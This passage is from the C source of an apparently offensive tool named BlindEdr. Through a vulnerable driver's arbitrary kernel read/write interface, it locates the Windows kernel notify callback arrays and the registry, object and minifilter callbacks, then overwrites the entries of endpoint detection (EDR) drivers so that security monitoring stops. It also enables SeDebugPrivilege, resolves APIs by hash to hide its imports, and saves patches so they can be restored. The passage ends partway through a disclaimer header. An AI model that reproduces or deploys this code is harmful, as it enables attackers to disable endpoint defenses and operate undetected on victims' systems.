PspNotifyRoutineArrayAddress = leaInstrAddr + PspOffset + 7 85 | return leaInstrAddr + offset + 7; 86 | } 87 | 88 | // Prints and clears callback entries 89 | VOID PrintAndClearCallBack(INT64 PspNotifyRoutineAddress, CHAR* CallBackRegFunc) { 90 | // Validate input parameters 91 | if (!PspNotifyRoutineAddress || !CallBackRegFunc) { 92 | PRINT("Invalid parameters provided\n"); 93 | return; 94 | } 95 | 96 | // Use stack memory instead of heap to avoid memory fragmentation 97 | BYTE data[8] = {0}; 98 | 99 | PRINT("----------------------------------------------------\n"); 100 | PRINT("Register driver for %s callback: \n----------------------------------------------------\n\n", CallBackRegFunc); 101 | 102 | // Define array size as constant for better maintainability 103 | static const UINT64 MAX_CALLBACKS = 64; 104 | UINT64 processedCount = 0; 105 | 106 | // Iterate through callback array 107 | for (UINT64 k = 0; k < MAX_CALLBACKS; k++) { 108 | INT64 buffer = 0; 109 | 110 | // Read callback entry 111 | DriverMemoryOperation((VOID*)(PspNotifyRoutineAddress + (k * 8)), &buffer, 8, MEMORY_WRITE); 112 | if (!buffer) continue; 113 | 114 | // Extract callback address using bitwise operation (equivalent to (buffer >> 4) << 4) 115 | INT64 tmpaddr = buffer & ~0xFULL; 116 | if (!tmpaddr) continue; 117 | 118 | // Get driver callback function address 119 | INT64 DriverCallBackFuncAddr = 0; 120 | DriverMemoryOperation((VOID*)(tmpaddr + 8), &DriverCallBackFuncAddr, 8, MEMORY_WRITE); 121 | if (!DriverCallBackFuncAddr) continue; 122 | 123 | // Get and validate driver name 124 | CHAR* DriverName = GetDriverName(DriverCallBackFuncAddr); 125 | if (!DriverName) continue; 126 | 127 | // Increment processed count for monitoring 128 | processedCount++; 129 | PRINT("%s", DriverName); 130 | 131 | // Handle EDR driver detection and clearing 132 | if (IsEDRHash(DriverName)) { 133 | DriverMemoryOperation(data, (PVOID)(PspNotifyRoutineAddress + (k * 8)), 8, MEMORY_WRITE); 134 | PRINT("\t[Clear]\n"); 135 | } else { 136 | PRINT("\n"); 137 | } 138 | } 139 | 140 | // Print summary of processed callbacks 141 | PRINT("\nProcessed %llu callback(s)\n\n", processedCount); 142 | } 143 | 144 | 145 | VOID ClearThreeCallBack() { 146 | // Define callback type structure 147 | struct CallbackInfo { 148 | UINT32 routineNameHash; 149 | const CHAR* routineName; 150 | INT64 address; 151 | }; 152 | 153 | 154 | // Define all callbacks to be processed 155 | struct CallbackInfo callbacks[] = { 156 | {PsSetCreateProcessNotifyRoutine_CH,"PsSetCreateProcessNotifyRoutine", 0}, 157 | {PsSetCreateThreadNotifyRoutine_CH, "PsSetCreateThreadNotifyRoutine", 0}, 158 | {PsSetLoadImageNotifyRoutine_CH, "PsSetLoadImageNotifyRoutine", 0} 159 | }; 160 | 161 | // Get and process all callbacks 162 | for (int i = 0; i < sizeof(callbacks) / sizeof(callbacks[0]); i++) { 163 | callbacks[i].address = GetPspNotifyRoutineArrayH(callbacks[i].routineNameHash); 164 | 165 | if (callbacks[i].address) { 166 | PrintAndClearCallBack(callbacks[i].address, (CHAR*)callbacks[i].routineName); 167 | } else { 168 | PRINT("Failed to obtain %s callback address.\n", callbacks[i].routineName); 169 | } 170 | } 171 | } -------------------------------------------------------------------------------- /BlindEdr/Common.c: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | #include "Structs.h" 3 | #include "FunctionPointers.h" 4 | 5 | #include 6 | 7 | 8 | 9 | char* ci_strstr(const char* str1, const char* str2) { 10 | // Handle empty pattern string case 11 | if (!*str2) return (char*)str1; 12 | 13 | // Iterate through each character in the main string as potential starting position 14 | for (const char* haystack = str1; *haystack; haystack++) { 15 | const char* h = haystack; 16 | const char* n = str2; 17 | 18 | // Compare from current position 19 | while (*h && *n && 20 | tolower((unsigned char)*h) == tolower((unsigned char)*n)) { 21 | h++; 22 | n++; 23 | } 24 | 25 | // If pattern string is fully matched, return starting position 26 | if (!*n) return (char*)haystack; 27 | } 28 | 29 | return NULL; 30 | } 31 | 32 | VOID Memcpy(IN PVOID pDestination, IN PVOID pSource, SIZE_T sLength) 33 | { 34 | PBYTE D = (PBYTE)pDestination; 35 | PBYTE S = (PBYTE)pSource; 36 | 37 | while (sLength--) { 38 | *D++ = *S++; 39 | } 40 | } 41 | 42 | 43 | BOOL saveMemoryFile() { 44 | HANDLE hFile = INVALID_HANDLE_VALUE; 45 | DWORD nNumberOfBytesToWrite = 0; 46 | PMemoryPatch ppt = GetContext()->PatchTable; 47 | 48 | // Create patch file 49 | hFile = CreateFileA(PATCH_FILE_NAME, 50 | GENERIC_WRITE, 51 | 0, 52 | NULL, 53 | CREATE_ALWAYS, 54 | FILE_ATTRIBUTE_NORMAL, 55 | NULL); 56 | 57 | if (hFile == INVALID_HANDLE_VALUE) { 58 | PRINT("Failed to create patch file\n"); 59 | return FALSE; 60 | } 61 | 62 | // Write each patch entry 63 | PMemoryPatch p = ppt; 64 | while (p) { 65 | // Write patch address 66 | if (!WriteFile(hFile, &p->pAddr, sizeof(PVOID), &nNumberOfBytesToWrite, NULL) || 67 | nNumberOfBytesToWrite != sizeof(PVOID)) { 68 | CloseHandle(hFile); 69 | return FALSE; 70 | } 71 | 72 | // Write data size 73 | if (!WriteFile(hFile, &p->szData, sizeof(UINT64), &nNumberOfBytesToWrite, NULL) || 74 | nNumberOfBytesToWrite != sizeof(UINT64)) { 75 | CloseHandle(hFile); 76 | return FALSE; 77 | } 78 | 79 | // Write patch data 80 | if (!WriteFile(hFile, p->pData, p->szData, &nNumberOfBytesToWrite, NULL) || 81 | nNumberOfBytesToWrite != p->szData) { 82 | CloseHandle(hFile); 83 | return FALSE; 84 | } 85 | 86 | p = p->pNext; 87 | } 88 | 89 | CloseHandle(hFile); 90 | PRINT("Patch record saved\n"); 91 | return TRUE; 92 | } 93 | 94 | BOOL restoreBlindness() { 95 | HANDLE hFile = INVALID_HANDLE_VALUE; 96 | DWORD bytesRead = 0; 97 | MemoryPatch pt = { 0 }; 98 | PCHAR patchData = NULL; 99 | BOOL success = TRUE; 100 | 101 | // Open patch file 102 | hFile = CreateFileA(PATCH_FILE_NAME, 103 | GENERIC_READ, 104 | 0, 105 | NULL, 106 | OPEN_EXISTING, 107 | FILE_ATTRIBUTE_NORMAL, 108 | NULL); 109 | 110 | if (hFile == INVALID_HANDLE_VALUE) { 111 | PRINT("Failed to open patch file\n"); 112 | return FALSE; 113 | } 114 | 115 | PRINT("Restored patch\n"); 116 | // Read and apply patches 117 | while (TRUE) { 118 | // Read patch address 119 | if (!ReadFile(hFile, &pt.pAddr, sizeof(PVOID), &bytesRead, NULL) || 120 | bytesRead != sizeof(PVOID)) { 121 | break; // End of file or error 122 | } 123 | 124 | // Read data size 125 | if (!ReadFile(hFile, &pt.szData, sizeof(UINT64), &bytesRead, NULL) || 126 | bytesRead != sizeof(UINT64)) { 127 | success = FALSE; 128 | break; 129 | } 130 | 131 | // Validate data size 132 | if (pt.szData == 0) { 133 | break; 134 | } 135 | 136 | // Allocate buffer for patch data 137 | patchData = (PCHAR)calloc(pt.szData, 1); 138 | if (!patchData) { 139 | PRINT("Memory allocation failed for patch data\n"); 140 | success = FALSE; 141 | break; 142 | } 143 | 144 | // Read patch data 145 | if (!ReadFile(hFile, patchData, pt.szData, &bytesRead, NULL) || 146 | bytesRead != pt.szData) { 147 | success = FALSE; 148 | break; 149 | } 150 | 151 | // Apply patch 152 | DriverMemoryOperation(patchData, pt.pAddr, pt.szData, MEMORY_WRITE); 153 | PRINT("\t 0x%p -> %llu bytes\n", pt.pAddr, pt.szData); 154 | 155 | // Cleanup current patch data 156 | free(patchData); 157 | patchData = NULL; 158 | ZeroMemory(&pt, sizeof(MemoryPatch)); 159 | } 160 | 161 | // Final cleanup 162 | if (patchData) { 163 | free(patchData); 164 | } 165 | CloseHandle(hFile); 166 | 167 | if (success) { 168 | PRINT("All patches restored successfully\n"); 169 | } 170 | else { 171 | PRINT("Error occurred while restoring patches\n"); 172 | } 173 | 174 | return success; 175 | } 176 | 177 | BOOL BlindEdr() { 178 | 179 | // If it is Windows 11 24H2 version, 180 | // SedebugPrivilege must be enabled to obtain the kernel's imagebase address 181 | if (!EnablePrivilegeH()) { 182 | PRINT("Failed to handle privileges\n"); 183 | return FALSE; 184 | } 185 | 186 | static INT64 FltEnumerateFiltersAddr = 0; 187 | 188 | // Initialize filter manager 189 | FltEnumerateFiltersAddr = GetFuncAddressH(FLTMGRSYS_CH, FltEnumerateFilters_CH); 190 | 191 | if (!FltEnumerateFiltersAddr) { 192 | PRINT("Failed to get FltEnumerateFilters address\n"); 193 | return FALSE; 194 | } 195 | 196 | PRINT("Starting EDR kernel cleanup...\n"); 197 | 198 | // Clear system callbacks 199 | BOOL success = TRUE; 200 | 201 | __try { 202 | ClearThreeCallBack(); 203 | ClearObRegisterCallbacks(); 204 | ClearCmRegistercallback(); 205 | ClearMiniFilterCallBack(FltEnumerateFiltersAddr); 206 | } 207 | __except (EXCEPTION_EXECUTE_HANDLER) { 208 | PRINT("× Cleanup failed with exception: 0x%08x\n", GetExceptionCode()); 209 | success = FALSE; 210 | } 211 | 212 | if (!success) { 213 | PRINT("Warning: Some callbacks could not be cleared\n"); 214 | } 215 | 216 | // Save system state 217 | if (!saveMemoryFile()) { 218 | PRINT("Failed to save system state\n"); 219 | return FALSE; 220 | } 221 | 222 | PRINT("EDR kernel completed successfully\n"); 223 | return TRUE; 224 | } 225 | 226 | VOID DriverMemoryOperation( 227 | PVOID fromAddress, // Source ptr 228 | PVOID toAddress, // Target ptr 229 | size_t len, // Length 230 | MEMORY_OPERATION opType) 231 | { 232 | PBasic_INFO pbasic_info = GetContext(); 233 | 234 | PMemOp req = NULL; 235 | DWORD bytesRet = 0; 236 | BOOL success = FALSE; 237 | 238 | HANDLE hDevice = GetContextHandle(); 239 | PMemoryPatch ppt = GetPatchTable(); 240 | 241 | // Backup kernel memory before write operations 242 | if (opType == MEMORY_WRITE && (UINT64)toAddress > 0xFFFF000000000000) 243 | { 244 | PMemOp bkreq = NULL; 245 | PMemoryPatch cpt = NULL; 246 | PCHAR pBackup = (PCHAR)calloc(len, 1); 247 | 248 | if (pBackup) 249 | { 250 | bkreq = (PMemOp)malloc(sizeof(MemOp)); 251 | if (bkreq) 252 | { 253 | // Configure backup request 254 | bkreq->SourceAddress = toAddress; 255 | bkreq->Size = len; 256 | bkreq->DestinationAddress = pBackup; 257 | 258 | success = DeviceIoControl(hDevice, RW_MEM_CODE, bkreq, 259 | sizeof(MemOp), bkreq, sizeof(MemOp), &bytesRet, NULL); 260 | 261 | if (success) 262 | { 263 | // Update patch table 264 | cpt = (PMemoryPatch)malloc(sizeof(MemoryPatch)); 265 | if (cpt) 266 | { 267 | cpt->pAddr = toAddress; 268 | cpt->szData = len; 269 | cpt->pData = pBackup; 270 | cpt->pNext = pbasic_info->PatchTable; 271 | pbasic_info->PatchTable = cpt; 272 | } 273 | } 274 | free(bkreq); 275 | } 276 | else { 277 | free(pBackup); 278 | } 279 | } 280 | } 281 | 282 | // Execute memory operation 283 | req = (PMemOp)malloc(sizeof(MemOp)); 284 | if (req) 285 | { 286 | req->SourceAddress = fromAddress; 287 | req->Size = len; 288 | req->DestinationAddress = toAddress; 289 | 290 | success = DeviceIoControl(hDevice, RW_MEM_CODE, req, 291 | sizeof(MemOp), req, sizeof(MemOp), &bytesRet, NULL); 292 | 293 | if (!success) { 294 | CloseHandle(hDevice); 295 | } 296 | free(req); 297 | } 298 | } 299 | 300 | PVOID GetModuleBaseH(IN UINT32 NAME_HASH) 301 | { 302 | // Simple static cache with last lookup 303 | static UINT32 lastHash = 0; 304 | static PVOID lastBase = NULL; 305 | 306 | // Check cache first 307 | if (lastHash == NAME_HASH && lastBase) { 308 | return lastBase; 309 | } 310 | 311 | PRTL_PROCESS_MODULES ModuleInfo = NULL; 312 | PVOID result = NULL; 313 | 314 | // Allocate buffer for module info 315 | ModuleInfo = (PRTL_PROCESS_MODULES)calloc(1024 * 1024, 1); 316 | if (!ModuleInfo) { 317 | return NULL; 318 | } 319 | 320 | __try { 321 | // Query system modules 322 | if (NT_SUCCESS(NtQuerySystemInformation( 323 | SystemModuleInformation, 324 | ModuleInfo, 325 | 1024 * 1024, 326 | NULL))) 327 | { 328 | // Find target module 329 | for (ULONG i = 0; i < ModuleInfo->NumberOfModules; i++) 330 | { 331 | PCHAR moduleName = (PCHAR)(ModuleInfo->Modules[i].FullPathName + 332 | ModuleInfo->Modules[i].OffsetToFileName); 333 | 334 | if (NAME_HASH == CHASH(moduleName)) { 335 | result = ModuleInfo->Modules[i].ImageBase; 336 | PRINT("Module: %s, Base Address: 0x%llx\n", moduleName, (UINT64)result); 337 | // Update cache 338 | lastHash = NAME_HASH; 339 | lastBase = result; 340 | break; 341 | } 342 | } 343 | } 344 | } 345 | __except (EXCEPTION_EXECUTE_HANDLER) { 346 | result = NULL; 347 | } 348 | 349 | free(ModuleInfo); 350 | return result; 351 | } 352 | 353 | BOOL EnablePrivilegeH() 354 | { 355 | HANDLE hToken = NULL; 356 | TOKEN_PRIVILEGES tp = { 0 }; 357 | LUID luid = { 0 }; 358 | BOOL bResult = FALSE; 359 | 360 | // Only enable privilege elevation for Windows 11 24H2 (Build 26100) 361 | DWORD buildNumber = GetNtBuild(); 362 | if (buildNumber != 26100) { 363 | PRINT("Current build number: %d, privilege elevation not required\n", buildNumber); 364 | return TRUE; 365 | } 366 | 367 | // Get required API functions from advapi32.dll 368 | HMODULE hAdvapi32 = GetModuleHandleH(advapi32dll_CH, FALSE); 369 | if (!hAdvapi32) { 370 | PRINT("Failed to get advapi32.dll handle\n"); 371 | return FALSE; 372 | } 373 | 374 | // Resolve function addresses using API hashing 375 | fnOpenProcessToken pOpenProcessToken = 376 | (fnOpenProcessToken)GetProcAddressH(hAdvapi32, OpenProcessToken_CH); 377 | fnLookupPrivilegeValueA pLookupPrivilegeValue = 378 | (fnLookupPrivilegeValueA)GetProcAddressH(hAdvapi32, LookupPrivilegeValueA_CH); 379 | fnAdjustTokenPrivileges pAdjustTokenPrivileges = 380 | (fnAdjustTokenPrivileges)GetProcAddressH(hAdvapi32, AdjustTokenPrivileges_CH); 381 | 382 | if (!pOpenProcessToken || !pLookupPrivilegeValue || !pAdjustTokenPrivileges) { 383 | PRINT("Failed to get required function addresses\n"); 384 | return FALSE; 385 | } 386 | 387 | __try { 388 | // Open process token with required access rights 389 | if (!pOpenProcessToken(GetCurrentProcess(), 390 | TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, 391 | &hToken)) 392 | { 393 | PRINT("OpenProcessToken failed with %d\n", GetLastError()); 394 | __leave; 395 | } 396 | 397 | // Use the complete privilege name 398 | const char* privName = "SeDebugPrivilege"; // Full privilege name 399 | 400 | // Get LUID for SeDebugPrivilege 401 | if (!pLookupPrivilegeValue(NULL, privName, &luid)) 402 | { 403 | PRINT("LookupPrivilegeValue failed with %d\n", GetLastError()); 404 | __leave; 405 | } 406 | 407 | // Setup privilege array 408 | tp.PrivilegeCount = 1; 409 | tp.Privileges[0].Luid = luid; 410 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 411 | 412 | // Adjust token privileges to enable SeDebugPrivilege 413 | if (!pAdjustTokenPrivileges(hToken, 414 | FALSE, 415 | &tp, 416 | sizeof(TOKEN_PRIVILEGES), 417 | NULL, 418 | NULL)) 419 | { 420 | PRINT("AdjustTokenPrivileges failed with %d\n", GetLastError()); 421 | __leave; 422 | } 423 | 424 | // Check if the privilege was actually assigned 425 | if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) { 426 | PRINT("The token does not have the specified privilege\n"); 427 | __leave; 428 | } 429 | 430 | bResult = TRUE; 431 | PRINT("Successfully enabled SeDebugPrivilege\n"); 432 | } 433 | __except(EXCEPTION_EXECUTE_HANDLER) { 434 | PRINT("Exception occurred while enabling privilege: 0x%08x\n", GetExceptionCode()); 435 | bResult = FALSE; 436 | } 437 | 438 | // Cleanup 439 | if (hToken) { 440 | CloseHandle(hToken); 441 | } 442 | 443 | return bResult; 444 | } 445 | 446 | 447 | UINT64 GetFuncAddressH(IN UINT32 ModuleNameHash, IN UINT32 FuncNameHash) 448 | { 449 | // Get kernel module base 450 | PVOID KBase = GetModuleBaseH(ModuleNameHash); 451 | if (!KBase) { 452 | PRINT("Can't get the ModuleBase!\n"); 453 | return 0; 454 | } 455 | 456 | // Get user-mode module handle 457 | HMODULE hModule = NULL; 458 | HMODULE hKernel32 = GetModuleHandleH(kernel32dll_CH, FALSE); 459 | if (!hKernel32) { 460 | return 0; 461 | } 462 | 463 | // Load appropriate module 464 | if (ModuleNameHash == FLTMGRSYS_CH) { 465 | fnLoadLibraryExA pLoadLibraryEx = (fnLoadLibraryExA)GetProcAddressH(hKernel32, LoadLibraryExA_CH); 466 | if (pLoadLibraryEx) { 467 | hModule = pLoadLibraryEx("C:\\windows\\system32\\drivers\\FLTMGR.SYS", 468 | NULL, DONT_RESOLVE_DLL_REFERENCES); 469 | } 470 | } else if(ModuleNameHash == NTOSKRNLEXE_CH){ 471 | fnLoadLibraryA pLoadLibrary = (fnLoadLibraryA)GetProcAddressH(hKernel32, LoadLibraryA_CH); 472 | if (pLoadLibrary) { 473 | hModule = pLoadLibrary("ntoskrnl.exe"); 474 | } 475 | } 476 | 477 | if (!hModule) { 478 | return 0; 479 | } 480 | 481 | // Get and calculate final function address 482 | VOID* ProcAddr = GetProcAddressH(hModule, FuncNameHash); 483 | return ProcAddr ? ((UINT64)KBase + ((UINT64)ProcAddr - (UINT64)hModule)) : 0; 484 | } 485 | 486 | 487 | UINT64 CalculateOffset(UINT64 address, int startOffset, int count) { 488 | BYTE* buffer = (BYTE*)malloc(1); 489 | UINT64 offset = 0; 490 | 491 | for (int i = count, k = 24; i > startOffset; i--, k -= 8) { 492 | DriverMemoryOperation((VOID*)(address + i), buffer, 1, MEMORY_WRITE); 493 | offset = ((UINT64)*buffer << k) + offset; 494 | } 495 | 496 | if ((offset & SIGN_EXTENSION_MASK) == SIGN_EXTENSION_MASK) { 497 | offset |= FULL_EXTENSION_MASK; 498 | } 499 | 500 | return offset; 501 | } 502 | 503 | BOOLEAN ValidateLeaPattern(const BYTE* data) { 504 | if ((data[0] == 0x4C && data[1] == 0x8D) || (data[0] == 0x48 && data[1] == 0x8D)) { 505 | if ((data[2] == 0x0D) || (data[2] == 0x15) || (data[2] == 0x1D) || 506 | (data[2] == 0x25) || (data[2] == 0x2D) || (data[2] == 0x35) || 507 | (data[2] == 0x3D)) { 508 | return TRUE; 509 | } 510 | } 511 | else { 512 | return FALSE; 513 | } 514 | } 515 | 516 | BOOLEAN ValidateCallJmpPattern(const BYTE* data) { 517 | return (data[0] == 0xE8 || data[0] == 0xE9); 518 | } 519 | 520 | 521 | // Search for instruction pattern '48 8D 05' 522 | // LEA RAX, [RIP + displacement] 523 | BOOLEAN ValidateLeaRipPattern(const BYTE* data) { 524 | // Check REX.W prefix (48) 525 | if (data[0] != 0x48) return FALSE; 526 | 527 | // Check LEA opcode (8D) 528 | if (data[1] != 0x8D) return FALSE; 529 | 530 | // Check ModR/M byte for RIP-relative addressing (05) 531 | if (data[2] != 0x05) return FALSE; 532 | 533 | return TRUE; 534 | } 535 | 536 | BOOLEAN ValidateMovPattern(const BYTE* data) { 537 | // Check REX.W prefix (48) 538 | if (data[0] != 0x4C) return FALSE; 539 | 540 | // Check LEA opcode (8D) 541 | if (data[1] != 0x8B) return FALSE; 542 | 543 | // Check ModR/M byte for RIP-relative addressing (05) 544 | if (data[2] != 0x05) return FALSE; 545 | 546 | return TRUE; 547 | } 548 | 549 | BOOLEAN ValidateCmUnRegisterPattern(const BYTE* data) { 550 | // return (data[0] == 0x48 && data[1] == 0x8D && data[2] == 0x54) && (data[5] == 0x48 && data[6] == 0x8D && data[7] == 0x0D); 551 | // TODO-shoule be modified. 552 | return (data[0] == 0x48 && data[1] == 0x8D && data[2] == 0x0D); 553 | } 554 | 555 | // Find pattern in memory 556 | UINT64 FindPattern(UINT64 startAddress, const PATTERN_SEARCH* pattern, int maxCount) { 557 | if (!pattern || pattern->length == 0) { 558 | return 0; 559 | } 560 | 561 | BYTE* buffer = (BYTE*)malloc(pattern->length); 562 | if (!buffer) { 563 | return 0; 564 | } 565 | 566 | int count = 0; 567 | UINT64 currentAddr = startAddress; 568 | 569 | while (count++ < maxCount) { 570 | // Read memory at current address 571 | DriverMemoryOperation((VOID*)currentAddr, buffer, pattern->length, MEMORY_WRITE); 572 | 573 | if (pattern->validate) { 574 | if (pattern->validate(buffer)) { 575 | free(buffer); 576 | return currentAddr; 577 | } 578 | } 579 | 580 | currentAddr++; 581 | } 582 | 583 | free(buffer); 584 | return 0; 585 | } 586 | 587 | -------------------------------------------------------------------------------- /BlindEdr/Common.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "Structs.h" 6 | 7 | #include "ApiHashing.h" 8 | #include "Debug.h" 9 | 10 | #pragma comment(lib,"ntdll.lib") 11 | #pragma comment(lib, "Psapi.lib") 12 | 13 | 14 | 15 | #define DRIVER_NAME L"\\\\.\\Leviathan" 16 | 17 | #define SIGN_EXTENSION_MASK 0x00000000ff000000 18 | #define FULL_EXTENSION_MASK 0xffffffff00000000 19 | 20 | #define PATCH_FILE_NAME "MemoryFile.data" 21 | 22 | #define RW_MEM_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0xAE86, METHOD_BUFFERED, FILE_ANY_ACCESS) 23 | 24 | // main.c 25 | BOOL saveMemoryFile(); 26 | BOOL restoreBlindness(); 27 | BOOL BlindEdr(); 28 | // Context.c 29 | static Basic_INFO g_Context = { 0 }; 30 | 31 | BOOL NyxInitializeContext(void); 32 | 33 | PBasic_INFO GetContext(void); 34 | PMemoryPatch GetPatchTable(void); 35 | HANDLE GetContextHandle(void); 36 | 37 | DWORD GetNtVersion(void); 38 | DWORD GetNtBuild(void); 39 | DWORD GetNtMinorVersion(void); 40 | 41 | VOID CleanupContext(void); 42 | 43 | 44 | // Module operations 45 | PVOID GetModuleBaseH(IN UINT32 NAME_HASH); 46 | UINT64 GetFuncAddressH(IN UINT32 ModuleNameHash, IN UINT32 FuncNameHash); 47 | 48 | 49 | // Read Driver 50 | CHAR* ReadDriverName(INT64 FLT_FILTERAddr); 51 | CHAR* GetDriverName(UINT64 DriverCallBackFuncAddr); 52 | 53 | 54 | // EDRDetector.c 55 | // EDR operations 56 | VOID AddEDRIntance(INT64 IntanceAddr); 57 | BOOL IsEDRIntance(INT j, INT64 Flink); 58 | BOOL IsEDRHash(const PCHAR DriverName); 59 | 60 | 61 | 62 | // Common.c 63 | // Memory operation wrapper 64 | VOID DriverMemoryOperation( 65 | PVOID fromAddress, // Source ptr 66 | PVOID toAddress, // Target ptr 67 | size_t len, // Length 68 | MEMORY_OPERATION opType); // Operation type 69 | 70 | // Memory Operation 71 | // Pattern matching structure for instruction search 72 | 73 | // 1/8/2025 3:20PM 74 | // Pattern definition structure 75 | typedef struct { 76 | BYTE* pattern; // Byte sequence to match 77 | SIZE_T length; // Pattern length 78 | CHAR* name; // Pattern name for debugging 79 | BOOLEAN(*validate)(const BYTE* data); // Optional additional validation function 80 | } PATTERN_SEARCH; 81 | 82 | 83 | 84 | UINT64 CalculateOffset(UINT64 address, int startOffset, int count); 85 | 86 | 87 | // Common.c 88 | UINT64 FindPattern(UINT64 startAddress, const PATTERN_SEARCH* pattern, int maxCount); 89 | 90 | BOOLEAN ValidateLeaPattern(const BYTE* data); 91 | 92 | BOOLEAN ValidateCallJmpPattern(const BYTE* data); 93 | 94 | BOOLEAN ValidateLeaRipPattern(const BYTE* data); 95 | 96 | BOOLEAN ValidateMovPattern(const BYTE* data); 97 | 98 | BOOLEAN ValidateCmUnRegisterPattern(const BYTE* data); 99 | 100 | HMODULE GetModuleHandleH(IN UINT32 uModuleHash, IN BOOL isKernel); 101 | FARPROC GetProcAddressH(IN HMODULE hModule, IN UINT32 uApiHash); 102 | 103 | 104 | // Predefined patterns 105 | static const PATTERN_SEARCH PREDEFINED_PATTERNS[] = { 106 | // CALL/JMP pattern 107 | { 108 | .pattern = (BYTE[]){0xE8}, 109 | .length = 1, 110 | .name = "CALL/JMP", 111 | .validate = ValidateCallJmpPattern 112 | }, 113 | // LEA pattern 114 | { 115 | .pattern = (BYTE[]){0x4C, 0x00, 0x00}, // Third byte will be checked in validation 116 | .length = 3, 117 | .name = "LEA", 118 | .validate = ValidateLeaPattern 119 | }, 120 | // FltEnumerate pattern 121 | { 122 | .pattern = (BYTE[]){0x48, 0x8D, 0x05}, 123 | .length = 3, 124 | .name = "FltEnumerate", 125 | .validate = NULL // No additional validation needed 126 | }, 127 | // LEA RIP-relative pattern 128 | { 129 | .pattern = (BYTE[]){0x48, 0x8D, 0x05}, 130 | .length = 3, 131 | .name = "LEA_RIP", 132 | .validate = ValidateLeaRipPattern 133 | }, 134 | // MOV pattern 135 | { 136 | .pattern = (BYTE[]){0x4C, 0x8B, 0x05}, 137 | .length = 3, 138 | .name = "MOV", 139 | .validate = ValidateMovPattern 140 | }, 141 | 142 | // LEA RCX, [RIP + displacement] 143 | { 144 | // .pattern = (BYTE[]){0x48, 0x8D, 0x54, 0x00, 0x00, 0x48, 0x8D, 0x0D}, 145 | .pattern = (BYTE[]){0x48, 0x8D, 0x0D}, 146 | .length = 3, 147 | .name = "CmUnRegisterCallback", 148 | .validate = ValidateCmUnRegisterPattern 149 | } 150 | 151 | // Add more patterns as needed 152 | }; 153 | 154 | 155 | VOID Memcpy(IN PVOID pDestination, IN PVOID pSource, SIZE_T sLength); 156 | 157 | 158 | -------------------------------------------------------------------------------- /BlindEdr/Context.c: -------------------------------------------------------------------------------- 1 | #include "Common.h" 2 | #include "Structs.h" 3 | 4 | #include 5 | #include 6 | 7 | BOOL NyxInitializeContext(void) { 8 | HANDLE hDevice = NULL; 9 | DWORD dwMajor = 0; 10 | DWORD dwMinor = 0; 11 | DWORD dwBuild = 0; 12 | 13 | HINSTANCE hinst = LoadLibraryA("ntdll.dll"); 14 | 15 | if (hinst == NULL) { 16 | // LOG 17 | return FALSE; 18 | } 19 | 20 | hDevice = CreateFileW( 21 | DRIVER_NAME, 22 | GENERIC_WRITE | GENERIC_READ, 23 | 0, 24 | NULL, 25 | OPEN_EXISTING, 26 | FILE_ATTRIBUTE_NORMAL, 27 | NULL 28 | ); 29 | 30 | if (hDevice == INVALID_HANDLE_VALUE) { 31 | // LOG 32 | return FALSE; 33 | } 34 | 35 | NTPROC proc = (NTPROC)GetProcAddress(hinst, "RtlGetNtVersionNumbers"); 36 | proc(&dwMajor, &dwMinor, &dwBuild); 37 | dwBuild &= 0xffff; 38 | 39 | // Do not support Windows 8 40 | if (dwMajor == 6 && dwMinor == 2) { 41 | PRINT("Not Support\r\n"); 42 | return FALSE; 43 | } 44 | 45 | g_Context.hDevice = hDevice; 46 | g_Context.PatchTable = (PMemoryPatch)NULL; 47 | g_Context.Systeminfo.dwMajor = dwMajor; 48 | g_Context.Systeminfo.dwBuild = dwBuild; 49 | g_Context.Systeminfo.dwMinorVersion = dwMinor; 50 | 51 | return TRUE; 52 | } 53 | 54 | PBasic_INFO GetContext(void) { 55 | return &g_Context; 56 | } 57 | 58 | PMemoryPatch GetPatchTable(void) { 59 | return g_Context.PatchTable; 60 | } 61 | 62 | DWORD GetNtVersion(void) { 63 | return g_Context.Systeminfo.dwMajor; 64 | } 65 | 66 | DWORD GetNtBuild(void) { 67 | return g_Context.Systeminfo.dwBuild; 68 | } 69 | 70 | DWORD GetNtMinorVersion(void) { 71 | return g_Context.Systeminfo.dwMinorVersion; 72 | } 73 | 74 | HANDLE GetContextHandle(void) { 75 | return g_Context.hDevice; 76 | } 77 | 78 | VOID CleanupContext(void) 79 | { 80 | PMemoryPatch current = g_Context.PatchTable; 81 | while (current != NULL) { 82 | PMemoryPatch next = current->pNext; 83 | 84 | if (current->pData) { 85 | free(current->pData); 86 | } 87 | free(current); 88 | current = next; 89 | } 90 | g_Context.PatchTable = NULL; 91 | 92 | if (g_Context.hDevice != NULL && g_Context.hDevice != INVALID_HANDLE_VALUE) { 93 | CloseHandle(g_Context.hDevice); 94 | g_Context.hDevice = NULL; 95 | } 96 | 97 | g_Context.Systeminfo.dwBuild = 0; 98 | g_Context.Systeminfo.dwMajor = 0; 99 | g_Context.Systeminfo.dwMinorVersion = 0; 100 | } -------------------------------------------------------------------------------- /BlindEdr/Debug.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | 6 | // #define DEBUG 7 | 8 | 9 | #ifdef DEBUG 10 | 11 | 12 | VOID CreateDebugConsole(); 13 | 14 | #define ERROR_BUF_SIZE (MAX_PATH * 2) 15 | #define GET_FILENAME(path) (strrchr(path, '\\') ? strrchr(path, '\\') + 1 : path) 16 | 17 | 18 | #define PRINT(STR, ...) \ 19 | if (1) { \ 20 | LPSTR cBuffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, ERROR_BUF_SIZE); \ 21 | if (cBuffer) { \ 22 | sprintf_s(cBuffer, ERROR_BUF_SIZE, STR, __VA_ARGS__); \ 23 | WriteConsoleA(GetStdHandle(STD_OUTPUT_HANDLE), cBuffer, (DWORD)strlen(cBuffer), NULL, NULL); \ 24 | HeapFree(GetProcessHeap(), 0x00, cBuffer); \ 25 | } \ 26 | } 27 | 28 | #else 29 | #define PRINT( STR, ... ) 30 | #endif // DEBUG -------------------------------------------------------------------------------- /BlindEdr/Disclaimer.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | BOOL showDisclaimer() { 7 | // Save original console cursor info 8 | HANDLE hConsole = 